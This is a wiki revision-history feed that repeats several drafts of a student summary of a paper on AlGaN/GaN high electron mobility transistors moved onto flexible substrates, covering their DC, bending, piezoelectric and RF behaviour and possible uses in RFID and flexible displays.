This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
&amp;lt;p&amp;gt; This article has the objective to show the implementation of transistors on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
The main contribution of this project is the use of method for making a transistor, not on a rigid substrate but on a flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors show that it is possible to transfer a transistor, which had growing on a rigid substrate, on a flexible substrate, and have the same performances.&lt;br /&gt;
In addition, the piezoelectric effect adds performances when the transistor is under strain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Applications =&lt;br /&gt;
&amp;lt;p&amp;gt; With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization. But RFID needs microwaye power, and need to be very performant in his bandwidth, in order to supply good informations during reading.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible, and also more performant. In fact, the RF characteristics globally still the same, and the performance in terms of strain (flat or bent) still also the same. With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&amp;lt;/p&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32028</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=32028"/>
				<updated>2016-06-13T11:25:47Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
= Applications =&lt;br /&gt;
&amp;lt;p&amp;gt; With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology. &amp;lt;br /&amp;gt;&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization. But RFID needs microwaye power, and need to be very performant in his bandwidth, in order to supply good informations during reading.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible, and also more performant. In fact, the RF characteristics globally still the same, and the performance in terms of strain (flat or bent) still also the same. With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;br /&amp;gt;&lt;br /&gt;
HEMTs on a flexible support is a good way to mix medium power, high frequency, and flexibility.&amp;lt;/p&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=31863</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=31863"/>
				<updated>2016-06-03T14:24:59Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
= Applications =&lt;br /&gt;
&amp;lt;p&amp;gt; With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology.&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization. But RFID needs microwaye power, and need to be very performant in his bandwidth, in order to supply good informations during reading.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible, and also more performant. In fact, the RF characteristics globally still the same, and the performance in terms of strain (flat or bent) still also the same. With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;/p&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=31862</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=31862"/>
				<updated>2016-06-03T14:20:23Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Applications */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
= Applications =&lt;br /&gt;
&amp;lt;p&amp;gt; With an industrial asking to have more and more of large bandwidth, HEMT are very used in the industry of telecommunication, for 3G or 4G technology.&lt;br /&gt;
But this is not the only field in which we use HEMT.&amp;lt;br /&amp;gt; For example, to make RFID, we need transistor, which have a very selective bandwidth, due to the very perturbing environment of utilization.&lt;br /&gt;
Transfer HEMT, from a rigid substrate to a flexible substrate can allow us to do RFID tag more light, more flexible. With this technology, we can patch RFID tag wherever we want.&amp;lt;br /&amp;gt;&lt;br /&gt;
Another application is for flexible display. With the same way as RFID, we are able now to put a screen for example on a special paper, which will be form with HEMT transistors on flexible substrate.&amp;lt;/p&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=31861</id>
		<title>AlGaN/GaN HEMTs</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=AlGaN/GaN_HEMTs&amp;diff=31861"/>
				<updated>2016-06-03T14:09:39Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
= Summary =&lt;br /&gt;
&amp;lt;p&amp;gt; This article is talking about '''AlGaN/GaN high electron mobility transistor (HEMT)'''. It is an heretostructure field effect transistor (HFET).&amp;lt;br /&amp;gt;&lt;br /&gt;
This kind of transistor allows to the electron a best mobility. In fact, a heterojunction with a '''highly n-doped bandgap''' (here AlGaN) and '''a undoped bandgap''' (here GaN) allow to electrons to go faster on the other side. The layer between this 2 sides is called '''2-DEG (two-dimensional electron gas)'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Authors introduces first the subject, their target, and why fabricate this kind of transistor. It's a molecular beam epitaxy. A 21-nm AlGaN barrier is grown on a silicon substrate. In a second time, this barrier is processed on a rigid Si substrate by lithography. Only after this 2 steps, the transistor is transferred on a flexible substrate.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After an explanation of DC characteristics of the transistor on a Silicium (Si) subtrate, they explain '''the effect of the transfer on a flexible substrate''' on the DC transistor characteristics. They try to explain all changes on the Ids-Vds characteristics, on C-V profile, on the Nd-Na profile, in order to show which parameters are modified, and what are the consequences of this modifications.&amp;lt;br /&amp;gt;&lt;br /&gt;
The first observation is on the maximum drain current density. It drops down when the transistor is transferred on a flexible substrate (930 mA/mm before, 450 mA/mm after the transfer).&lt;br /&gt;
The second observation is the behavior of the transfer characteristics. It does not follow the ideal transfer characteristics.&amp;lt;br /&amp;gt;&lt;br /&gt;
This 2 observations are '''due to the poor thermal conductivity of the polymer''' which form the flexible tape. In order to confirm this hypothesis, they decided to plot the C-V profile. They show that no deviation is observed in C-V profile in terms of frequency dispersion and charges density. They confirm that the '''2-DEG density is not affected and assume that no additional defects are created during the transfer'''.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
After this study, they try to show '''the effect of the bending''' on the DC characteristics. They explain that the characteristics are not the same if the flexible tape is flat or  if it is bent. They realize the bending with a semicylindrical chuck with 15 mm raduis of curvature. With this chuck, strain is in the gate direction. The effect on the I-V characteristic is light. And due to the difference between the thermal conductivity between the 2 chuck they use for analysis, they do analysis with a low drain-source voltage. They show that the on-resistance (Ron) is decreased, and the sheet resistance (Rs - 11% decrease) also. It is due to the increase of 2-DEG density (in 2-DEG, the parameter which translate the mobility of the electron (&amp;amp;#x03bc;n) increased, and sheet resistance is directly close to this parameter)&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
In a thrid part, they try to characterize the peizoelectric behavior of the transistor in flat and bent configuration. All semiconductors which are in III-N column of Mendeleiev Table of Elements is piezoelectric. It means that any deformation or strain involve a tension inside the semiconductor.&amp;lt;br /&amp;gt;&lt;br /&gt;
They show that an '''increase of 6% of 2-DEG density'''. They deduce that the convex configuration involve an increase of 6% of 2-DEG density, so involve a tension.&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Finally, they study RF characteristics of this kind of transistor. They show '''a difference of 8 GHz between the theoretical cutoff frequency (40 GHz) and the experimental cutoff frequency (32 GHz)'''. This difference is due to the approximation to determine the gate-to-2-DEG capacitance and the gate-to-drain capacitance, which are used in the little-signal model of a transistor.&amp;lt;/p&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Main contribution =&lt;br /&gt;
= Applications =&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	</feed>